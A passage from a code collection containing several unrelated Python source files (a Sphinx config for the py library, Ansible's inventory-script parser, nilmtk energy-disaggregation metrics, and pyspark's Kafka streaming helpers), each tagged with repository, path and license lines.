        total += counts["total"]
        total_patched += counts["patched"]
        total_renego += counts["unpatched_renego"]

        report.writerow([rating, counts["patched"], counts["total"],
                         total_patched, total,
                         ("%.2f%%" % ((float(total_patched) / float(total)) * 100.0 if total else 0,)),
                         counts["unpatched_renego"], total_renego,
                         ("%.2f%%" % ((float(total_renego) / float(total - total_patched)) * 100.0 if total - total_patched else 0,)),
                         ])
apache-2.0
akiss77/servo
tests/wpt/web-platform-tests/tools/py/doc/conf.py
218
8482
# -*- coding: utf-8 -*-
#
# py documentation build configuration file, created by
# sphinx-quickstart on Thu Oct 21 08:30:10 2010.
#
# This file is execfile()d with the current directory set to its containing dir.
#
# Note that not all possible configuration values are present in this
# autogenerated file.
#
# All configuration values have a default; values that are commented out
# serve to show the default.

import sys, os

# If extensions (or modules to document with autodoc) are in another directory,
# add these directories to sys.path here. If the directory is relative to the
# documentation root, use os.path.abspath to make it absolute, like shown here.
#sys.path.insert(0, os.path.abspath('.'))

# -- General configuration -----------------------------------------------------

# If your documentation needs a minimal Sphinx version, state it here.
#needs_sphinx = '1.0'

# Add any Sphinx extension module names here, as strings. They can be extensions
# coming with Sphinx (named 'sphinx.ext.*') or your custom ones.
extensions = ['sphinx.ext.autodoc', 'sphinx.ext.doctest', 'sphinx.ext.intersphinx',
    'sphinx.ext.viewcode']

# Add any paths that contain templates here, relative to this directory.
templates_path = ['_templates']

# The suffix of source filenames.
source_suffix = '.txt'

# The encoding of source files.
#source_encoding = 'utf-8-sig'

# The master toctree document.
master_doc = 'index'

# General information about the project.
project = u'py'
copyright = u'2010, holger krekel et. al.'

# The version info for the project you're documenting, acts as replacement for
# |version| and |release|, also used in various other places throughout the
# built documents.
#
# The short X.Y version.
# The full version, including alpha/beta/rc tags.
import py
release = py.__version__
version = ".".join(release.split(".")[:2])

# The language for content autogenerated by Sphinx. Refer to documentation
# for a list of supported languages.
#language = None

# There are two options for replacing |today|: either, you set today to some
# non-false value, then it is used:
#today = ''
# Else, today_fmt is used as the format for a strftime call.
#today_fmt = '%B %d, %Y'

# List of patterns, relative to source directory, that match files and
# directories to ignore when looking for source files.
exclude_patterns = ['_build']

# The reST default role (used for this markup: `text`) to use for all documents.
#default_role = None

# If true, '()' will be appended to :func: etc. cross-reference text.
#add_function_parentheses = True

# If true, the current module name will be prepended to all description
# unit titles (such as .. function::).
#add_module_names = True

# If true, sectionauthor and moduleauthor directives will be shown in the
# output. They are ignored by default.
#show_authors = False

# The name of the Pygments (syntax highlighting) style to use.
pygments_style = 'sphinx'

# A list of ignored prefixes for module index sorting.
#modindex_common_prefix = []


# -- Options for HTML output ---------------------------------------------------

# The theme to use for HTML and HTML Help pages.  See the documentation for
# a list of builtin themes.
html_theme = 'default'

# Theme options are theme-specific and customize the look and feel of a theme
# further.  For a list of options available for each theme, see the
# documentation.
#html_theme_options = {}

# Add any paths that contain custom themes here, relative to this directory.
#html_theme_path = []

# The name for this set of Sphinx documents.  If None, it defaults to
# "<project> v<release> documentation".
#html_title = None

# A shorter title for the navigation bar.  Default is the same as html_title.
#html_short_title = None

# The name of an image file (relative to this directory) to place at the top
# of the sidebar.
#html_logo = None

# The name of an image file (within the static path) to use as favicon of the
# docs.  This file should be a Windows icon file (.ico) being 16x16 or 32x32
# pixels large.
#html_favicon = None

# Add any paths that contain custom static files (such as style sheets) here,
# relative to this directory. They are copied after the builtin static files,
# so a file named "default.css" will overwrite the builtin "default.css".
html_static_path = ['_static']

# If not '', a 'Last updated on:' timestamp is inserted at every page bottom,
# using the given strftime format.
#html_last_updated_fmt = '%b %d, %Y'

# If true, SmartyPants will be used to convert quotes and dashes to
# typographically correct entities.
#html_use_smartypants = True

# Custom sidebar templates, maps document names to template names.
#html_sidebars = {}

# Additional templates that should be rendered to pages, maps page names to
# template names.
#html_additional_pages = {}

# If false, no module index is generated.
#html_domain_indices = True

# If false, no index is generated.
#html_use_index = True

# If true, the index is split into individual pages for each letter.
#html_split_index = False

# If true, links to the reST sources are added to the pages.
#html_show_sourcelink = True

# If true, "Created using Sphinx" is shown in the HTML footer. Default is True.
#html_show_sphinx = True

# If true, "(C) Copyright ..." is shown in the HTML footer. Default is True.
#html_show_copyright = True

# If true, an OpenSearch description file will be output, and all pages will
# contain a <link> tag referring to it.  The value of this option must be the
# base URL from which the finished HTML is served.
#html_use_opensearch = ''

# This is the file name suffix for HTML files (e.g. ".xhtml").
#html_file_suffix = None

# Output file base name for HTML help builder.
htmlhelp_basename = 'py'


# -- Options for LaTeX output --------------------------------------------------

# The paper size ('letter' or 'a4').
#latex_paper_size = 'letter'

# The font size ('10pt', '11pt' or '12pt').
#latex_font_size = '10pt'

# Grouping the document tree into LaTeX files. List of tuples
# (source start file, target name, title, author, documentclass [howto/manual]).
latex_documents = [
  ('index', 'py.tex', u'py Documentation',
   u'holger krekel et. al.', 'manual'),
]

# The name of an image file (relative to this directory) to place at the top of
# the title page.
#latex_logo = None

# For "manual" documents, if this is true, then toplevel headings are parts,
# not chapters.
#latex_use_parts = False

# If true, show page references after internal links.
#latex_show_pagerefs = False

# If true, show URL addresses after external links.
#latex_show_urls = False

# Additional stuff for the LaTeX preamble.
#latex_preamble = ''

# Documents to append as an appendix to all manuals.
#latex_appendices = []

# If false, no module index is generated.
#latex_domain_indices = True


# -- Options for manual page output --------------------------------------------

# One entry per manual page. List of tuples
# (source start file, name, description, authors, manual section).
man_pages = [
    ('index', 'py', u'py Documentation',
     [u'holger krekel et. al.'], 1)
]

autodoc_member_order = "bysource"
# FIX: autodoc_default_flags must be a *list* of flag names.  The original
# assigned the bare string "inherited-members"; autodoc iterates the value, so
# a string is walked character by character and the flag is silently ignored.
autodoc_default_flags = ["inherited-members"]


# -- Options for Epub output ---------------------------------------------------

# Bibliographic Dublin Core info.
epub_title = u'py'
epub_author = u'holger krekel et. al.'
epub_publisher = u'holger krekel et. al.'
epub_copyright = u'2010, holger krekel et. al.'

# The language of the text. It defaults to the language option
# or en if the language is not set.
#epub_language = ''

# The scheme of the identifier. Typical schemes are ISBN or URL.
#epub_scheme = ''

# The unique identifier of the text. This can be a ISBN number
# or the project homepage.
#epub_identifier = ''

# A unique identification for the text.
#epub_uid = ''

# HTML files that should be inserted before the pages created by sphinx.
# The format is a list of tuples containing the path and title.
#epub_pre_files = []

# HTML files that should be inserted after the pages created by sphinx.
# The format is a list of tuples containing the path and title.
#epub_post_files = []

# A list of files that should not be packed into the epub file.
#epub_exclude_files = []

# The depth of the table of contents in toc.ncx.
#epub_tocdepth = 3

# Allow duplicate toc entries.
#epub_tocdup = True

# Example configuration for intersphinx: refer to the Python standard library.
intersphinx_mapping = {'http://docs.python.org/': None}
mpl-2.0
tgerla/ansible
lib/ansible/inventory/script.py
27
6367
# (c) 2012-2014, Michael DeHaan <michael.dehaan@gmail.com> # # This file is part of Ansible # # Ansible is free software: you can redistribute it and/or modify # it under the terms of the GNU General Public License as published by # the Free Software Foundation, either version 3 of the License, or # (at your option) any later version. # # Ansible is distributed in the hope that it will be useful, # but WITHOUT ANY WARRANTY; without even the implied warranty of # MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the # GNU General Public License for more details. # # You should have received a copy of the GNU General Public License # along with Ansible. If not, see <http://www.gnu.org/licenses/>. ############################################# from __future__ import (absolute_import, division, print_function) __metaclass__ = type import os import subprocess import sys from collections import Mapping from six import iteritems from ansible import constants as C from ansible.errors import * from ansible.inventory.host import Host from ansible.inventory.group import Group from ansible.module_utils.basic import json_dict_bytes_to_unicode class InventoryScript: ''' Host inventory parser for ansible using external inventory scripts. ''' def __init__(self, loader, filename=C.DEFAULT_HOST_LIST): self._loader = loader # Support inventory scripts that are not prefixed with some # path information but happen to be in the current working # directory when '.' is not in PATH. 
self.filename = os.path.abspath(filename) cmd = [ self.filename, "--list" ] try: sp = subprocess.Popen(cmd, stdout=subprocess.PIPE, stderr=subprocess.PIPE) except OSError as e: raise AnsibleError("problem running %s (%s)" % (' '.join(cmd), e)) (stdout, stderr) = sp.communicate() if sp.returncode != 0: raise AnsibleError("Inventory script (%s) had an execution error: %s " % (filename,stderr)) self.data = stdout # see comment about _meta below self.host_vars_from_top = None self.groups = self._parse(stderr) def _parse(self, err): all_hosts = {} # not passing from_remote because data from CMDB is trusted try: self.raw = self._loader.load(self.data) except Exception as e: sys.stderr.write(err + "\n") raise AnsibleError("failed to parse executable inventory script results from {0}: {1}".format(self.filename, str(e))) if not isinstance(self.raw, Mapping): sys.stderr.write(err + "\n") raise AnsibleError("failed to parse executable inventory script results from {0}: data needs to be formatted as a json dict".format(self.filename)) self.raw = json_dict_bytes_to_unicode(self.raw) all = Group('all') groups = dict(all=all) group = None for (group_name, data) in self.raw.items(): # in Ansible 1.3 and later, a "_meta" subelement may contain # a variable "hostvars" which contains a hash for each host # if this "hostvars" exists at all then do not call --host for each # host. This is for efficiency and scripts should still return data # if called with --host for backwards compat with 1.2 and earlier. 
if group_name == '_meta': if 'hostvars' in data: self.host_vars_from_top = data['hostvars'] continue if group_name != all.name: group = groups[group_name] = Group(group_name) else: group = all host = None if not isinstance(data, dict): data = {'hosts': data} # is not those subkeys, then simplified syntax, host with vars elif not any(k in data for k in ('hosts','vars')): data = {'hosts': [group_name], 'vars': data} if 'hosts' in data: if not isinstance(data['hosts'], list): raise AnsibleError("You defined a group \"%s\" with bad " "data for the host list:\n %s" % (group_name, data)) for hostname in data['hosts']: if not hostname in all_hosts: all_hosts[hostname] = Host(hostname) host = all_hosts[hostname] group.add_host(host) if 'vars' in data: if not isinstance(data['vars'], dict): raise AnsibleError("You defined a group \"%s\" with bad " "data for variables:\n %s" % (group_name, data)) for k, v in iteritems(data['vars']): if group.name == all.name: all.set_variable(k, v) else: group.set_variable(k, v) # Separate loop to ensure all groups are defined for (group_name, data) in self.raw.items(): if group_name == '_meta': continue if isinstance(data, dict) and 'children' in data: for child_name in data['children']: if child_name in groups: groups[group_name].add_child_group(groups[child_name]) for group in groups.values(): if group.depth == 0 and group.name != 'all': all.add_child_group(group) return groups def get_host_variables(self, host): """ Runs <script> --host <hostname> to determine additional host variables """ if self.host_vars_from_top is not None: got = self.host_vars_from_top.get(host.name, {}) return got cmd = [self.filename, "--host", host.name] try: sp = subprocess.Popen(cmd, stdout=subprocess.PIPE, stderr=subprocess.PIPE) except OSError as e: raise AnsibleError("problem running %s (%s)" % (' '.join(cmd), e)) (out, err) = sp.communicate() if out.strip() == '': return dict() try: return json_dict_bytes_to_unicode(self._loader.load(out)) except 
ValueError: raise AnsibleError("could not parse post variable response: %s, %s" % (cmd, out))
gpl-3.0
jaduimstra/nilmtk
nilmtk/metrics.py
5
13373
'''Metrics to compare disaggregation performance against ground truth data. All metrics functions have the same interface. Each function takes `predictions` and `ground_truth` parameters. Both of which are nilmtk.MeterGroup objects. Each function returns one of two types: either a pd.Series or a single float. Most functions return a pd.Series where each index element is a meter instance int or a tuple of ints for MeterGroups. Notation -------- Below is the notation used to mathematically define each metric. :math:`T` - number of time slices. :math:`t` - a time slice. :math:`N` - number of appliances. :math:`n` - an appliance. :math:`y^{(n)}_t` - ground truth power of appliance :math:`n` in time slice :math:`t`. :math:`\\hat{y}^{(n)}_t` - estimated power of appliance :math:`n` in time slice :math:`t`. :math:`x^{(n)}_t` - ground truth state of appliance :math:`n` in time slice :math:`t`. :math:`\\hat{x}^{(n)}_t` - estimated state of appliance :math:`n` in time slice :math:`t`. Functions --------- ''' from __future__ import print_function, division import numpy as np import pandas as pd import math from .metergroup import MeterGroup, iterate_through_submeters_of_two_metergroups from .electric import align_two_meters def error_in_assigned_energy(predictions, ground_truth): """Compute error in assigned energy. .. math:: error^{(n)} = \\left | \\sum_t y^{(n)}_t - \\sum_t \\hat{y}^{(n)}_t \\right | Parameters ---------- predictions, ground_truth : nilmtk.MeterGroup Returns ------- errors : pd.Series Each index is an meter instance int (or tuple for MeterGroups). Each value is the absolute error in assigned energy for that appliance, in kWh. 
""" errors = {} both_sets_of_meters = iterate_through_submeters_of_two_metergroups( predictions, ground_truth) for pred_meter, ground_truth_meter in both_sets_of_meters: sections = pred_meter.good_sections() ground_truth_energy = ground_truth_meter.total_energy(sections=sections) predicted_energy = pred_meter.total_energy(sections=sections) errors[pred_meter.instance()] = np.abs(ground_truth_energy - predicted_energy) return pd.Series(errors) def fraction_energy_assigned_correctly(predictions, ground_truth): '''Compute fraction of energy assigned correctly .. math:: fraction = \\sum_n min \\left ( \\frac{\\sum_n y}{\\sum_{n,t} y}, \\frac{\\sum_n \\hat{y}}{\\sum_{n,t} \\hat{y}} \\right ) Ignores distinction between different AC types, instead if there are multiple AC types for each meter then we just take the max value across the AC types. Parameters ---------- predictions, ground_truth : nilmtk.MeterGroup Returns ------- fraction : float in the range [0,1] Fraction of Energy Correctly Assigned. ''' predictions_submeters = MeterGroup(meters=predictions.submeters().meters) ground_truth_submeters = MeterGroup(meters=ground_truth.submeters().meters) fraction_per_meter_predictions = predictions_submeters.fraction_per_meter() fraction_per_meter_ground_truth = ground_truth_submeters.fraction_per_meter() fraction_per_meter_ground_truth.index = fraction_per_meter_ground_truth.index.map(lambda meter: meter.instance) fraction_per_meter_predictions.index = fraction_per_meter_predictions.index.map(lambda meter: meter.instance) fraction = 0 for meter_instance in predictions_submeters.instance(): fraction += min(fraction_per_meter_ground_truth[meter_instance], fraction_per_meter_predictions[meter_instance]) return fraction def mean_normalized_error_power(predictions, ground_truth): '''Compute mean normalized error in assigned power .. 
math:: error^{(n)} = \\frac { \\sum_t {\\left | y_t^{(n)} - \\hat{y}_t^{(n)} \\right |} } { \\sum_t y_t^{(n)} } Parameters ---------- predictions, ground_truth : nilmtk.MeterGroup Returns ------- mne : pd.Series Each index is an meter instance int (or tuple for MeterGroups). Each value is the MNE for that appliance. ''' mne = {} both_sets_of_meters = iterate_through_submeters_of_two_metergroups( predictions, ground_truth) for pred_meter, ground_truth_meter in both_sets_of_meters: total_abs_diff = 0.0 sum_of_ground_truth_power = 0.0 for aligned_meters_chunk in align_two_meters(pred_meter, ground_truth_meter): diff = aligned_meters_chunk.icol(0) - aligned_meters_chunk.icol(1) total_abs_diff += sum(abs(diff.dropna())) sum_of_ground_truth_power += aligned_meters_chunk.icol(1).sum() mne[pred_meter.instance()] = total_abs_diff / sum_of_ground_truth_power return pd.Series(mne) def rms_error_power(predictions, ground_truth): '''Compute RMS error in assigned power .. math:: error^{(n)} = \\sqrt{ \\frac{1}{T} \\sum_t{ \\left ( y_t - \\hat{y}_t \\right )^2 } } Parameters ---------- predictions, ground_truth : nilmtk.MeterGroup Returns ------- error : pd.Series Each index is an meter instance int (or tuple for MeterGroups). Each value is the RMS error in predicted power for that appliance. ''' error = {} both_sets_of_meters = iterate_through_submeters_of_two_metergroups( predictions, ground_truth) for pred_meter, ground_truth_meter in both_sets_of_meters: sum_of_squared_diff = 0.0 n_samples = 0 for aligned_meters_chunk in align_two_meters(pred_meter, ground_truth_meter): diff = aligned_meters_chunk.icol(0) - aligned_meters_chunk.icol(1) diff.dropna(inplace=True) sum_of_squared_diff += (diff ** 2).sum() n_samples += len(diff) error[pred_meter.instance()] = math.sqrt(sum_of_squared_diff / n_samples) return pd.Series(error) def f1_score(predictions, ground_truth): '''Compute F1 scores. .. 
math:: F_{score}^{(n)} = \\frac {2 * Precision * Recall} {Precision + Recall} Parameters ---------- predictions, ground_truth : nilmtk.MeterGroup Returns ------- f1_scores : pd.Series Each index is an meter instance int (or tuple for MeterGroups). Each value is the F1 score for that appliance. If there are multiple chunks then the value is the weighted mean of the F1 score for each chunk. ''' # If we import sklearn at top of file then sphinx breaks. from sklearn.metrics import f1_score as sklearn_f1_score # sklearn produces lots of DepreciationWarnings with PyTables import warnings warnings.filterwarnings("ignore", category=DeprecationWarning) f1_scores = {} both_sets_of_meters = iterate_through_submeters_of_two_metergroups( predictions, ground_truth) for pred_meter, ground_truth_meter in both_sets_of_meters: scores_for_meter = pd.DataFrame(columns=['score', 'n_samples']) for aligned_states_chunk in align_two_meters(pred_meter, ground_truth_meter, 'when_on'): aligned_states_chunk.dropna(inplace=True) aligned_states_chunk = aligned_states_chunk.astype(int) score = sklearn_f1_score(aligned_states_chunk.icol(0), aligned_states_chunk.icol(1)) scores_for_meter = scores_for_meter.append( {'score': score, 'n_samples': len(aligned_states_chunk)}, ignore_index=True) # Calculate weighted mean tot_samples = scores_for_meter['n_samples'].sum() scores_for_meter['proportion'] = (scores_for_meter['n_samples'] / tot_samples) avg_score = (scores_for_meter['score'] * scores_for_meter['proportion']).sum() f1_scores[pred_meter.instance()] = avg_score return pd.Series(f1_scores) ##### FUNCTIONS BELOW THIS LINE HAVE NOT YET BEEN CONVERTED TO NILMTK v0.2 ##### """ def confusion_matrices(predicted_states, ground_truth_states): '''Compute confusion matrix between appliance states for each appliance Parameters ---------- predicted_state: Pandas DataFrame of type {appliance : [array of predicted states]} ground_truth_state: Pandas DataFrame of type {appliance : [array of ground truth 
states]} Returns ------- dict of type {appliance : confusion matrix} ''' re = {} for appliance in predicted_states: matrix = np.zeros([np.max(ground_truth_states[appliance]) + 1, np.max(ground_truth_states[appliance]) + 1]) for time in predicted_states[appliance]: matrix[predicted_states.values[time, appliance], ground_truth_states.values[time, appliance]] += 1 re[appliance] = matrix return re def tp_fp_fn_tn(predicted_states, ground_truth_states): '''Compute counts of True Positives, False Positives, False Negatives, True Negatives .. math:: TP^{(n)} = \\sum_{t} and \\left ( x^{(n)}_t = on, \\hat{x}^{(n)}_t = on \\right ) FP^{(n)} = \\sum_{t} and \\left ( x^{(n)}_t = off, \\hat{x}^{(n)}_t = on \\right ) FN^{(n)} = \\sum_{t} and \\left ( x^{(n)}_t = on, \\hat{x}^{(n)}_t = off \\right ) TN^{(n)} = \\sum_{t} and \\left ( x^{(n)}_t = off, \\hat{x}^{(n)}_t = off \\right ) Parameters ---------- predicted_state: Pandas DataFrame of type {appliance : [array of predicted states]} ground_truth_state: Pandas DataFrame of type {appliance : [array of ground truth states]} Returns ------- numpy array where columns represent appliances and rows represent: [TP, FP, FN, TN] ''' # assumes state 0 = off, all other states = on predicted_states_on = predicted_states > 0 ground_truth_states_on = ground_truth_states > 0 tp = np.sum(np.logical_and(predicted_states_on.values == True, ground_truth_states_on.values == True), axis=0) fp = np.sum(np.logical_and(predicted_states_on.values == True, ground_truth_states_on.values == False), axis=0) fn = np.sum(np.logical_and(predicted_states_on.values == False, ground_truth_states_on.values == True), axis=0) tn = np.sum(np.logical_and(predicted_states_on.values == False, ground_truth_states_on.values == False), axis=0) return np.array([tp, fp, fn, tn]).astype(float) def tpr_fpr(predicted_states, ground_truth_states): '''Compute True Positive Rate and False Negative Rate .. 
math:: TPR^{(n)} = \\frac{TP}{\\left ( TP + FN \\right )} FPR^{(n)} = \\frac{FP}{\\left ( FP + TN \\right )} Parameters ---------- predicted_state: Pandas DataFrame of type {appliance : [array of predicted states]} ground_truth_state: Pandas DataFrame of type {appliance : [array of ground truth states]} Returns ------- numpy array where columns represent appliances and rows represent: [TPR, FPR] ''' tfpn = tp_fp_fn_tn(predicted_states, ground_truth_states) tpr = tfpn[0, :] / (tfpn[0, :] + tfpn[2, :]) fpr = tfpn[1, :] / (tfpn[1, :] + tfpn[3, :]) return np.array([tpr, fpr]) def precision_recall(predicted_states, ground_truth_states): '''Compute Precision and Recall .. math:: Precision^{(n)} = \\frac{TP}{\\left ( TP + FP \\right )} Recall^{(n)} = \\frac{TP}{\\left ( TP + FN \\right )} Parameters ---------- predicted_state: Pandas DataFrame of type {appliance : [array of predicted states]} ground_truth_state: Pandas DataFrame of type {appliance : [array of ground truth states]} Returns ------- numpy array where columns represent appliances and rows represent: [Precision, Recall] ''' tfpn = tp_fp_fn_tn(predicted_states, ground_truth_states) prec = tfpn[0, :] / (tfpn[0, :] + tfpn[1, :]) rec = tfpn[0, :] / (tfpn[0, :] + tfpn[2, :]) return np.array([prec, rec]) def hamming_loss(predicted_state, ground_truth_state): '''Compute Hamming loss .. math:: HammingLoss = \\frac{1}{T} \\sum_{t} \\frac{1}{N} \\sum_{n} xor \\left ( x^{(n)}_t, \\hat{x}^{(n)}_t \\right ) Parameters ---------- predicted_state: Pandas DataFrame of type {appliance : [array of predicted states]} ground_truth_state: Pandas DataFrame of type {appliance : [array of ground truth states]} Returns ------- float of hamming_loss ''' num_appliances = np.size(ground_truth_state.values, axis=1) xors = np.sum((predicted_state.values != ground_truth_state.values), axis=1) / num_appliances return np.mean(xors) """
apache-2.0
taroplus/spark
python/pyspark/streaming/kafka.py
7
17318
# # Licensed to the Apache Software Foundation (ASF) under one or more # contributor license agreements. See the NOTICE file distributed with # this work for additional information regarding copyright ownership. # The ASF licenses this file to You under the Apache License, Version 2.0 # (the "License"); you may not use this file except in compliance with # the License. You may obtain a copy of the License at # # http://www.apache.org/licenses/LICENSE-2.0 # # Unless required by applicable law or agreed to in writing, software # distributed under the License is distributed on an "AS IS" BASIS, # WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. # See the License for the specific language governing permissions and # limitations under the License. # from py4j.protocol import Py4JJavaError from pyspark.rdd import RDD from pyspark.storagelevel import StorageLevel from pyspark.serializers import AutoBatchedSerializer, PickleSerializer, PairDeserializer, \ NoOpSerializer from pyspark.streaming import DStream from pyspark.streaming.dstream import TransformedDStream from pyspark.streaming.util import TransformFunction __all__ = ['Broker', 'KafkaMessageAndMetadata', 'KafkaUtils', 'OffsetRange', 'TopicAndPartition', 'utf8_decoder'] def utf8_decoder(s): """ Decode the unicode as UTF-8 """ if s is None: return None return s.decode('utf-8') class KafkaUtils(object): @staticmethod def createStream(ssc, zkQuorum, groupId, topics, kafkaParams=None, storageLevel=StorageLevel.MEMORY_AND_DISK_2, keyDecoder=utf8_decoder, valueDecoder=utf8_decoder): """ Create an input stream that pulls messages from a Kafka Broker. :param ssc: StreamingContext object :param zkQuorum: Zookeeper quorum (hostname:port,hostname:port,..). :param groupId: The group id for this consumer. :param topics: Dict of (topic_name -> numPartitions) to consume. Each partition is consumed in its own thread. :param kafkaParams: Additional params for Kafka :param storageLevel: RDD storage level. 
:param keyDecoder: A function used to decode key (default is utf8_decoder) :param valueDecoder: A function used to decode value (default is utf8_decoder) :return: A DStream object .. note:: Deprecated in 2.3.0 """ if kafkaParams is None: kafkaParams = dict() kafkaParams.update({ "zookeeper.connect": zkQuorum, "group.id": groupId, "zookeeper.connection.timeout.ms": "10000", }) if not isinstance(topics, dict): raise TypeError("topics should be dict") jlevel = ssc._sc._getJavaStorageLevel(storageLevel) helper = KafkaUtils._get_helper(ssc._sc) jstream = helper.createStream(ssc._jssc, kafkaParams, topics, jlevel) ser = PairDeserializer(NoOpSerializer(), NoOpSerializer()) stream = DStream(jstream, ssc, ser) return stream.map(lambda k_v: (keyDecoder(k_v[0]), valueDecoder(k_v[1]))) @staticmethod def createDirectStream(ssc, topics, kafkaParams, fromOffsets=None, keyDecoder=utf8_decoder, valueDecoder=utf8_decoder, messageHandler=None): """ Create an input stream that directly pulls messages from a Kafka Broker and specific offset. This is not a receiver based Kafka input stream, it directly pulls the message from Kafka in each batch duration and processed without storing. This does not use Zookeeper to store offsets. The consumed offsets are tracked by the stream itself. For interoperability with Kafka monitoring tools that depend on Zookeeper, you have to update Kafka/Zookeeper yourself from the streaming application. You can access the offsets used in each batch from the generated RDDs (see To recover from driver failures, you have to enable checkpointing in the StreamingContext. The information on consumed offset can be recovered from the checkpoint. See the programming guide for details (constraints, etc.). :param ssc: StreamingContext object. :param topics: list of topic_name to consume. :param kafkaParams: Additional params for Kafka. :param fromOffsets: Per-topic/partition Kafka offsets defining the (inclusive) starting point of the stream. 
:param keyDecoder: A function used to decode key (default is utf8_decoder). :param valueDecoder: A function used to decode value (default is utf8_decoder). :param messageHandler: A function used to convert KafkaMessageAndMetadata. You can assess meta using messageHandler (default is None). :return: A DStream object .. note:: Experimental .. note:: Deprecated in 2.3.0 """ if fromOffsets is None: fromOffsets = dict() if not isinstance(topics, list): raise TypeError("topics should be list") if not isinstance(kafkaParams, dict): raise TypeError("kafkaParams should be dict") def funcWithoutMessageHandler(k_v): return (keyDecoder(k_v[0]), valueDecoder(k_v[1])) def funcWithMessageHandler(m): m._set_key_decoder(keyDecoder) m._set_value_decoder(valueDecoder) return messageHandler(m) helper = KafkaUtils._get_helper(ssc._sc) jfromOffsets = dict([(k._jTopicAndPartition(helper), v) for (k, v) in fromOffsets.items()]) if messageHandler is None: ser = PairDeserializer(NoOpSerializer(), NoOpSerializer()) func = funcWithoutMessageHandler jstream = helper.createDirectStreamWithoutMessageHandler( ssc._jssc, kafkaParams, set(topics), jfromOffsets) else: ser = AutoBatchedSerializer(PickleSerializer()) func = funcWithMessageHandler jstream = helper.createDirectStreamWithMessageHandler( ssc._jssc, kafkaParams, set(topics), jfromOffsets) stream = DStream(jstream, ssc, ser).map(func) return KafkaDStream(stream._jdstream, ssc, stream._jrdd_deserializer) @staticmethod def createRDD(sc, kafkaParams, offsetRanges, leaders=None, keyDecoder=utf8_decoder, valueDecoder=utf8_decoder, messageHandler=None): """ Create an RDD from Kafka using offset ranges for each topic and partition. :param sc: SparkContext object :param kafkaParams: Additional params for Kafka :param offsetRanges: list of offsetRange to specify topic:partition:[start, end) to consume :param leaders: Kafka brokers for each TopicAndPartition in offsetRanges. May be an empty map, in which case leaders will be looked up on the driver. 
:param keyDecoder: A function used to decode key (default is utf8_decoder) :param valueDecoder: A function used to decode value (default is utf8_decoder) :param messageHandler: A function used to convert KafkaMessageAndMetadata. You can assess meta using messageHandler (default is None). :return: An RDD object .. note:: Experimental .. note:: Deprecated in 2.3.0 """ if leaders is None: leaders = dict() if not isinstance(kafkaParams, dict): raise TypeError("kafkaParams should be dict") if not isinstance(offsetRanges, list): raise TypeError("offsetRanges should be list") def funcWithoutMessageHandler(k_v): return (keyDecoder(k_v[0]), valueDecoder(k_v[1])) def funcWithMessageHandler(m): m._set_key_decoder(keyDecoder) m._set_value_decoder(valueDecoder) return messageHandler(m) helper = KafkaUtils._get_helper(sc) joffsetRanges = [o._jOffsetRange(helper) for o in offsetRanges] jleaders = dict([(k._jTopicAndPartition(helper), v._jBroker(helper)) for (k, v) in leaders.items()]) if messageHandler is None: jrdd = helper.createRDDWithoutMessageHandler( sc._jsc, kafkaParams, joffsetRanges, jleaders) ser = PairDeserializer(NoOpSerializer(), NoOpSerializer()) rdd = RDD(jrdd, sc, ser).map(funcWithoutMessageHandler) else: jrdd = helper.createRDDWithMessageHandler( sc._jsc, kafkaParams, joffsetRanges, jleaders) rdd = RDD(jrdd, sc).map(funcWithMessageHandler) return KafkaRDD(rdd._jrdd, sc, rdd._jrdd_deserializer) @staticmethod def _get_helper(sc): try: return sc._jvm.org.apache.spark.streaming.kafka.KafkaUtilsPythonHelper() except TypeError as e: if str(e) == "'JavaPackage' object is not callable": KafkaUtils._printErrorMsg(sc) raise @staticmethod def _printErrorMsg(sc): print(""" ________________________________________________________________________________________________ Spark Streaming's Kafka libraries not found in class path. Try one of the following. 1. 
Include the Kafka library and its dependencies with in the spark-submit command as $ bin/spark-submit --packages org.apache.spark:spark-streaming-kafka-0-8:%s ... 2. Download the JAR of the artifact from Maven Central http://search.maven.org/, Group Id = org.apache.spark, Artifact Id = spark-streaming-kafka-0-8-assembly, Version = %s. Then, include the jar in the spark-submit command as $ bin/spark-submit --jars <spark-streaming-kafka-0-8-assembly.jar> ... ________________________________________________________________________________________________ """ % (sc.version, sc.version)) class OffsetRange(object): """ Represents a range of offsets from a single Kafka TopicAndPartition. .. note:: Deprecated in 2.3.0 """ def __init__(self, topic, partition, fromOffset, untilOffset): """ Create an OffsetRange to represent range of offsets :param topic: Kafka topic name. :param partition: Kafka partition id. :param fromOffset: Inclusive starting offset. :param untilOffset: Exclusive ending offset. """ self.topic = topic self.partition = partition self.fromOffset = fromOffset self.untilOffset = untilOffset def __eq__(self, other): if isinstance(other, self.__class__): return (self.topic == other.topic and self.partition == other.partition and self.fromOffset == other.fromOffset and self.untilOffset == other.untilOffset) else: return False def __ne__(self, other): return not self.__eq__(other) def __str__(self): return "OffsetRange(topic: %s, partition: %d, range: [%d -> %d]" \ % (self.topic, self.partition, self.fromOffset, self.untilOffset) def _jOffsetRange(self, helper): return helper.createOffsetRange(self.topic, self.partition, self.fromOffset, self.untilOffset) class TopicAndPartition(object): """ Represents a specific topic and partition for Kafka. .. note:: Deprecated in 2.3.0 """ def __init__(self, topic, partition): """ Create a Python TopicAndPartition to map to the Java related object :param topic: Kafka topic name. :param partition: Kafka partition id. 
""" self._topic = topic self._partition = partition def _jTopicAndPartition(self, helper): return helper.createTopicAndPartition(self._topic, self._partition) def __eq__(self, other): if isinstance(other, self.__class__): return (self._topic == other._topic and self._partition == other._partition) else: return False def __ne__(self, other): return not self.__eq__(other) def __hash__(self): return (self._topic, self._partition).__hash__() class Broker(object): """ Represent the host and port info for a Kafka broker. .. note:: Deprecated in 2.3.0 """ def __init__(self, host, port): """ Create a Python Broker to map to the Java related object. :param host: Broker's hostname. :param port: Broker's port. """ self._host = host self._port = port def _jBroker(self, helper): return helper.createBroker(self._host, self._port) class KafkaRDD(RDD): """ A Python wrapper of KafkaRDD, to provide additional information on normal RDD. .. note:: Deprecated in 2.3.0 """ def __init__(self, jrdd, ctx, jrdd_deserializer): RDD.__init__(self, jrdd, ctx, jrdd_deserializer) def offsetRanges(self): """ Get the OffsetRange of specific KafkaRDD. :return: A list of OffsetRange """ helper = KafkaUtils._get_helper(self.ctx) joffsetRanges = helper.offsetRangesOfKafkaRDD(self._jrdd.rdd()) ranges = [OffsetRange(o.topic(), o.partition(), o.fromOffset(), o.untilOffset()) for o in joffsetRanges] return ranges class KafkaDStream(DStream): """ A Python wrapper of KafkaDStream .. note:: Deprecated in 2.3.0 """ def 